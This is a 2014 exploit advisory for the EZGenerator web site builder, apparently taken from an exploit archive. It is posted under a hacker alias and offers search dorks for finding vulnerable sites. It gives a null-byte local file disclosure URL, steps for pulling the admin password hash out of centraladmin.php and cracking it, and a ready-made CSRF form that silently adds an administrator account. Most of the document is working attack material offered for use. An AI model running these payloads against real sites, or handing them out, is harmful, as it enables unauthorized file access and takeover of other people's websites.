Home / exploits EZGenerator Cross Site Request Forgery / File Disclosure
Posted on 09 January 2014
EZGenerator – Local File Disclosure/Admin Data/CSRF Vulnerability ================================================================= #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Dork : inurl:”utils.php?action= inurl:”centraladmin.php?process=” (gR34‡$ T0 mY L0V3) #################################################################### ===[ Exploit ]=== Local File Disclosure: ===================== www.site.com/utils.php?action=download&filename=file.php%00 Admin Data =========== 1-download centraladmin.php via exploit file discloure [www.site.com/utils.php?action=download&filename=centraladmin.php%00] 2-when download file found it $ca_admin_username=”admin”; $ca_admin_pwd=”c89f9f4ef264e22001f9a9c3d72992ef”; 3-crack hash and join 4-admin panel: www.site.com/centraladmin.php CSRF [Add Admin]: ================ <form method=”POST” name=”form0″ action=” http://site/centraladmin.php?process=processuser“> <input type=”hidden” name=”flag” value=”add”/> <input type=”hidden” name=”old_username” value=”"/> <input type=”hidden” name=”username” value=”admin”/> <input type=”hidden” name=”name” value=”mm”/> <input type=”hidden” name=”sirname” value=”hh”/> <input type=”hidden” name=”email” value=”email@live.com“/> <input type=”hidden” name=”password” value=”12121212″/> <input type=”hidden” name=”repeatedpassword” value=”12121212″/> <input type=”hidden” name=”select_all” value=”yes”/> <input type=”hidden” name=”access_to_page47″ value=”2″/> <input type=”hidden” name=”save” value=”Save”/> </form> </body> </html> ####################################################################
